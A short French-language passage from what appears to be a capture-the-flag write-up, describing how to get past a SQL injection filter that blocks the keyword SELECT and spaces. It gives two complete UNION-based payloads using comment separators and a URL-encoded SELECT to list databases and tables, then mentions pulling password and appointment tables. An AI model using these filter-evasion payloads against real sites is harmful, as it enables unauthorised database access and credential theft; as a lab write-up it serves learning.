Rencontres
Nous devons ici faire face à certain filtres. Le SELECT et les espaces ne sont pas autorisé par exemple. En faisant un peut de recherche on tombe sur le site de PortSwigger.
Nous trouvons en bas de la page comment faire pour qu’il n’y ai pas d’espaces dans la commande (utilisation de /**/) et remplaçons le SELECT par %53%45%4c%45%43%54. Ce qui nous donne : '/**/UNION/**/%53%45%4c%45%43%54/**/1,2,schema_name/**/from/**/INFORMATION_SCHEMA.SCHEMATA/**/#
On se dirige vers la base de donnée RencontreVendeurs ('/**/UNION/**/%53%45%4c%45%43%54/**/1,TABLE_NAME,TABLE_SCHEMA/**/from/**/INFORMATION_SCHEMA.TABLES/**/where/**/table_schema='RencontreVendeurs'#) :
Nous n’avons plus qu’à récupérer les informations de la table password et de la table date.
Commençons par la table password (même étaps que pour la partie 2 mais avec le filtres):
Il ne nous reste plus que la table Rdv :
Nous avons maintenant tout ce qu’il nous faut.